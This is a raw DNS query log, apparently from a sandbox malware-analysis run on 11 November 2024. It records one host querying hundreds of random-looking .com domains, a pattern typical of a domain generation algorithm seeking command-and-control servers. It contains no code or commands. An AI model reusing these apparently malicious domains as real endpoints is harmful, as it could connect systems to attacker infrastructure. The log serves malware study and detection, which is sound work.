                                                                                                                                                                                                            Nov 11, 2024 18:08:25.277580023 CET192.168.2.91.1.1.10xea60Standard query (0)lyxylux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.285957098 CET192.168.2.91.1.1.10xaf62Standard query (0)vonyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.299024105 CET192.168.2.91.1.1.10xde20Standard query (0)gahyhob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.299221039 CET192.168.2.91.1.1.10x171bStandard query (0)puvytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.347852945 CET192.168.2.91.1.1.10xaa51Standard query (0)vojyjof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.392606020 CET192.168.2.91.1.1.10x987eStandard query (0)lyvytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.392880917 CET192.168.2.91.1.1.10xf035Standard query (0)qetyvep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.396352053 CET192.168.2.91.1.1.10x8c28Standard query (0)gatyvyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.460561037 CET192.168.2.91.1.1.10x80dbStandard query (0)pujyjav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.560158968 CET192.168.2.91.1.1.10xb0d4Standard query (0)pupybul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.753179073 CET192.168.2.91.1.1.10x2e47Standard query (0)lyryvex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:28.468717098 CET192.168.2.91.1.1.10x7022Standard query (0)qebyvyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:28.478286028 CET192.168.2.91.1.1.10x3ba7Standard query (0)pujytug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:28.493372917 CET192.168.2.91.1.1.10x2700Standard query (0)qetyhov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:28.721008062 CET192.168.2.91.1.1.10x3e84Standard query (0)qekytig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:28.737608910 CET192.168.2.91.1.1.10xcdeaStandard query (0)lymynuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.042829990 CET192.168.2.91.1.1.10xb9e9Standard query (0)vopyjac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.218015909 CET192.168.2.91.1.1.10xe9dcStandard query (0)vopybyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.394659996 CET192.168.2.91.1.1.10x3a03Standard query (0)gacyvub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.402087927 CET192.168.2.91.1.1.10x7f22Standard query (0)ganyfuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.405694008 CET192.168.2.91.1.1.10x502cStandard query (0)lyvyfux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.408781052 CET192.168.2.91.1.1.10xe9bbStandard query (0)lykyxoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.409430981 CET192.168.2.91.1.1.10x5806Standard query (0)pupywyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.411514044 CET192.168.2.91.1.1.10xa964Standard query (0)qekyxaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.423717976 CET192.168.2.91.1.1.10xe338Standard query (0)pufylul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.438628912 CET192.168.2.91.1.1.10x6dffStandard query (0)vonygit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.440996885 CET192.168.2.91.1.1.10xdc65Standard query (0)lysywyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.444607019 CET192.168.2.91.1.1.10xa356Standard query (0)pumygil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.446527004 CET192.168.2.91.1.1.10x2070Standard query (0)qedyruv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.447623968 CET192.168.2.91.1.1.10xa142Standard query (0)volycem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.338311911 CET192.168.2.91.1.1.10x5480Standard query (0)pumyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.357786894 CET192.168.2.91.1.1.10x198dStandard query (0)volyqat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.358637094 CET192.168.2.91.1.1.10x7d7Standard query (0)qedyfyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.359215975 CET192.168.2.91.1.1.10xdd1Standard query (0)vofygum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.512492895 CET192.168.2.91.1.1.10x59a0Standard query (0)gahykeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.517250061 CET192.168.2.91.1.1.10x9653Standard query (0)puvycel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.517644882 CET192.168.2.91.1.1.10xbef3Standard query (0)vowyguf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.517855883 CET192.168.2.91.1.1.10x38d4Standard query (0)lysymor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.519895077 CET192.168.2.91.1.1.10x79daStandard query (0)qexytil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.524005890 CET192.168.2.91.1.1.10x475Standard query (0)gatyniz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.525473118 CET192.168.2.91.1.1.10x88adStandard query (0)pujylyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.535084963 CET192.168.2.91.1.1.10x98e4Standard query (0)vopymit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.535593987 CET192.168.2.91.1.1.10xad6aStandard query (0)qebysaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.535959959 CET192.168.2.91.1.1.10xebf2Standard query (0)pupymol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.536499023 CET192.168.2.91.1.1.10xae3bStandard query (0)ganydeh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.536669016 CET192.168.2.91.1.1.10x6ecaStandard query (0)vowybyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.536825895 CET192.168.2.91.1.1.10x457eStandard query (0)lyrynux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.536968946 CET192.168.2.91.1.1.10x3bdStandard query (0)purybup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.537023067 CET192.168.2.91.1.1.10x1a03Standard query (0)gahyruh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.540128946 CET192.168.2.91.1.1.10x2583Standard query (0)vocypok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.541814089 CET192.168.2.91.1.1.10xca1dStandard query (0)gacycaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.545032024 CET192.168.2.91.1.1.10xa078Standard query (0)qegykeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.545090914 CET192.168.2.91.1.1.10xa850Standard query (0)puvypoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.560173035 CET192.168.2.91.1.1.10xdd5Standard query (0)vopyguk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.562290907 CET192.168.2.91.1.1.10x936eStandard query (0)qeqyfug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.563476086 CET192.168.2.91.1.1.10xc3c6Standard query (0)puzytul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.563695908 CET192.168.2.91.1.1.10x65fcStandard query (0)gadyhoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.564162016 CET192.168.2.91.1.1.10xe1f3Standard query (0)vofyjom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.564349890 CET192.168.2.91.1.1.10xfa22Standard query (0)qeqyvev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.564526081 CET192.168.2.91.1.1.10xb27cStandard query (0)gaqyfub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.564680099 CET192.168.2.91.1.1.10x6d6fStandard query (0)pufyjag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.564857960 CET192.168.2.91.1.1.10xe196Standard query (0)qegyryq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.565150023 CET192.168.2.91.1.1.10x7c79Standard query (0)lyrygid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.565417051 CET192.168.2.91.1.1.10x4c7aStandard query (0)vofyqek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.565588951 CET192.168.2.91.1.1.10xa9c0Standard query (0)puzyxip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.565743923 CET192.168.2.91.1.1.10x4ebcStandard query (0)purygiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.565891027 CET192.168.2.91.1.1.10x82ccStandard query (0)lymyfyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.566062927 CET192.168.2.91.1.1.10x9591Standard query (0)qexyxop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.566236019 CET192.168.2.91.1.1.10xf530Standard query (0)lygywyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.566426039 CET192.168.2.91.1.1.10xb02Standard query (0)pumydyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.566544056 CET192.168.2.91.1.1.10x36caStandard query (0)lyxytur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.566915989 CET192.168.2.91.1.1.10xdb2cStandard query (0)pufyweq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.567158937 CET192.168.2.91.1.1.10xf0b0Standard query (0)volyzic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.567393064 CET192.168.2.91.1.1.10x42ecStandard query (0)qekyluv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.567637920 CET192.168.2.91.1.1.10x64b8Standard query (0)lyxyxox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.568062067 CET192.168.2.91.1.1.10x5b7Standard query (0)gadyqaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.568208933 CET192.168.2.91.1.1.10xcef0Standard query (0)lykylud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.568398952 CET192.168.2.91.1.1.10xc14Standard query (0)vojykyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.568412066 CET192.168.2.91.1.1.10x3225Standard query (0)lyvysaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.580250025 CET192.168.2.91.1.1.10x6586Standard query (0)ganycob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.580872059 CET192.168.2.91.1.1.10x5419Standard query (0)qekyryp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.581070900 CET192.168.2.91.1.1.10xe093Standard query (0)lymyved.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.581543922 CET192.168.2.91.1.1.10x2002Standard query (0)vonydem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.581650972 CET192.168.2.91.1.1.10x8edStandard query (0)lygyjan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.581754923 CET192.168.2.91.1.1.10xce3dStandard query (0)vocycat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.581890106 CET192.168.2.91.1.1.10x99aaStandard query (0)gacypiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.594265938 CET192.168.2.91.1.1.10xebf8Standard query (0)pupyguq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.594449043 CET192.168.2.91.1.1.10x92c3Standard query (0)pumycav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.597031116 CET192.168.2.91.1.1.10x593dStandard query (0)qedyqal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.599186897 CET192.168.2.91.1.1.10x727aStandard query (0)galyzus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.616137981 CET192.168.2.91.1.1.10x54efStandard query (0)qetynup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:43.838057995 CET192.168.2.91.1.1.10x265dStandard query (0)pupybul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:43.838457108 CET192.168.2.91.1.1.10xb60aStandard query (0)qegyqaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:43.839376926 CET192.168.2.91.1.1.10xaea0Standard query (0)ganypih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:43.840536118 CET192.168.2.91.1.1.10x2d01Standard query (0)pumypog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:43.840636969 CET192.168.2.91.1.1.10xef10Standard query (0)volykyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:43.840821981 CET192.168.2.91.1.1.10xb52eStandard query (0)qedynul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:43.841221094 CET192.168.2.91.1.1.10x48b8Standard query (0)qeqysag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:43.842680931 CET192.168.2.91.1.1.10x13edStandard query (0)lymysan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:47.751359940 CET192.168.2.91.1.1.10x20a4Standard query (0)ganycob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.155383110 CET192.168.2.91.1.1.10x2eb2Standard query (0)gatyfuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.155822039 CET192.168.2.91.1.1.10xf5c6Standard query (0)pujywep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.155894041 CET192.168.2.91.1.1.10x81ceStandard query (0)qebyxog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.159490108 CET192.168.2.91.1.1.10xa75Standard query (0)pumypop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.161724091 CET192.168.2.91.1.1.10xabe3Standard query (0)lykyjar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.162848949 CET192.168.2.91.1.1.10x3d09Standard query (0)pupybyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.163932085 CET192.168.2.91.1.1.10xbacStandard query (0)gatyveh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.183475018 CET192.168.2.91.1.1.10x215eStandard query (0)purydel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.183510065 CET192.168.2.91.1.1.10xc2c2Standard query (0)vofymif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.183720112 CET192.168.2.91.1.1.10xf4edStandard query (0)qebytuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.183954000 CET192.168.2.91.1.1.10x9cd9Standard query (0)lyxylyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.184127092 CET192.168.2.91.1.1.10x8e83Standard query (0)pufymiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.187762022 CET192.168.2.91.1.1.10x2d3dStandard query (0)vojyjot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.196201086 CET192.168.2.91.1.1.10xd397Standard query (0)lyryvaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.200278997 CET192.168.2.91.1.1.10xe2d8Standard query (0)qetyfyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.205259085 CET192.168.2.91.1.1.10xfefdStandard query (0)vowycok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.752031088 CET192.168.2.91.1.1.10x4502Standard query (0)lysysir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.752590895 CET192.168.2.91.1.1.10xe1eStandard query (0)pupypil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.752633095 CET192.168.2.91.1.1.10x52dcStandard query (0)vonykam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.753079891 CET192.168.2.91.1.1.10xcba9Standard query (0)qekynyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.753293037 CET192.168.2.91.1.1.10x36eStandard query (0)galynus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.774236917 CET192.168.2.91.1.1.10x29a5Standard query (0)lyvyjoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.777092934 CET192.168.2.91.1.1.10x59d0Standard query (0)pujybev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.840996027 CET192.168.2.91.1.1.10x2944Standard query (0)vopyput.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.841695070 CET192.168.2.91.1.1.10x35ddStandard query (0)ganykah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.844882011 CET192.168.2.91.1.1.10xc93aStandard query (0)gatypuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.845443010 CET192.168.2.91.1.1.10x564cStandard query (0)vojybef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.845763922 CET192.168.2.91.1.1.10x8e88Standard query (0)lykynyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.846174955 CET192.168.2.91.1.1.10xb082Standard query (0)qebykoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.847986937 CET192.168.2.91.1.1.10x9728Standard query (0)lyryler.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.849611998 CET192.168.2.91.1.1.10x455cStandard query (0)pufypuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.853070021 CET192.168.2.91.1.1.10xec7Standard query (0)qexynyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.854038954 CET192.168.2.91.1.1.10x17c1Standard query (0)qegysiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.854311943 CET192.168.2.91.1.1.10xad1aStandard query (0)lymylen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.855098963 CET192.168.2.91.1.1.10x9adaStandard query (0)puvymug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.863626957 CET192.168.2.91.1.1.10x4999Standard query (0)lygysid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.863682032 CET192.168.2.91.1.1.10xac64Standard query (0)gacynyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.863801003 CET192.168.2.91.1.1.10x8fa8Standard query (0)vocymum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.863882065 CET192.168.2.91.1.1.10xd16eStandard query (0)vowykat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.863977909 CET192.168.2.91.1.1.10xe370Standard query (0)qetylel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.864083052 CET192.168.2.91.1.1.10xfc32Standard query (0)vojydoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.864181995 CET192.168.2.91.1.1.10x29bcStandard query (0)lyvymun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.865114927 CET192.168.2.91.1.1.10x6383Standard query (0)gahydos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.865319014 CET192.168.2.91.1.1.10xc4f8Standard query (0)purylal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.873424053 CET192.168.2.91.1.1.10xa6e2Standard query (0)qebyqig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.882452011 CET192.168.2.91.1.1.10x222cStandard query (0)pujydap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.883162975 CET192.168.2.91.1.1.10x5f08Standard query (0)vopyzyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.887875080 CET192.168.2.91.1.1.10xa3baStandard query (0)pumywov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.258372068 CET192.168.2.91.1.1.10x5460Standard query (0)qekyfep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.258634090 CET192.168.2.91.1.1.10x323bStandard query (0)qegyvag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.258773088 CET192.168.2.91.1.1.10xec86Standard query (0)gacyhuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.259138107 CET192.168.2.91.1.1.10x354eStandard query (0)vowyrec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.259573936 CET192.168.2.91.1.1.10x9401Standard query (0)gaqyres.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.259845018 CET192.168.2.91.1.1.10x4833Standard query (0)lyxygur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.260092974 CET192.168.2.91.1.1.10x1fa0Standard query (0)qexyhul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.260566950 CET192.168.2.91.1.1.10xa0b2Standard query (0)galyfez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.260598898 CET192.168.2.91.1.1.10x635cStandard query (0)lysyxuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.261190891 CET192.168.2.91.1.1.10xd6aaStandard query (0)gatyzyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.071819067 CET192.168.2.91.1.1.10x5e07Standard query (0)gadycih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.072045088 CET192.168.2.91.1.1.10x1ae1Standard query (0)qeqyrav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.072098017 CET192.168.2.91.1.1.10xfc03Standard query (0)lymywad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.072320938 CET192.168.2.91.1.1.10xec0bStandard query (0)puzygyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.072480917 CET192.168.2.91.1.1.10x3ca0Standard query (0)qedyxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.072658062 CET192.168.2.91.1.1.10x978fStandard query (0)purytyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.072757959 CET192.168.2.91.1.1.10xec36Standard query (0)lykyfax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.073030949 CET192.168.2.91.1.1.10xe723Standard query (0)ganyqib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.073059082 CET192.168.2.91.1.1.10xf2aStandard query (0)pufycog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.073371887 CET192.168.2.91.1.1.10x1fd9Standard query (0)gahyvab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.073371887 CET192.168.2.91.1.1.10x4e12Standard query (0)puvyjiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.073668003 CET192.168.2.91.1.1.10x84ffStandard query (0)vocyjik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.073688984 CET192.168.2.91.1.1.10x979aStandard query (0)lyrytyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.073976994 CET192.168.2.91.1.1.10x3987Standard query (0)qetytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.078263998 CET192.168.2.91.1.1.10x90e5Standard query (0)volygyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.078283072 CET192.168.2.91.1.1.10x6145Standard query (0)pupyxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.078500986 CET192.168.2.91.1.1.10xe168Standard query (0)vonyqof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.078671932 CET192.168.2.91.1.1.10xe8d7Standard query (0)vofycim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.079169989 CET192.168.2.91.1.1.10xfbd7Standard query (0)lygyvon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.527488947 CET192.168.2.91.1.1.10x46b5Standard query (0)gadypub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.532537937 CET192.168.2.91.1.1.10x865dStandard query (0)puzybeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.532618999 CET192.168.2.91.1.1.10x37fdStandard query (0)vofypuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.532763004 CET192.168.2.91.1.1.10x371fStandard query (0)pupyteg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.539993048 CET192.168.2.91.1.1.10x9f31Standard query (0)lyxynej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:52.540082932 CET192.168.2.91.1.1.10xcc3dStandard query (0)ganyhus.comA (IP address)IN (0x0001)false
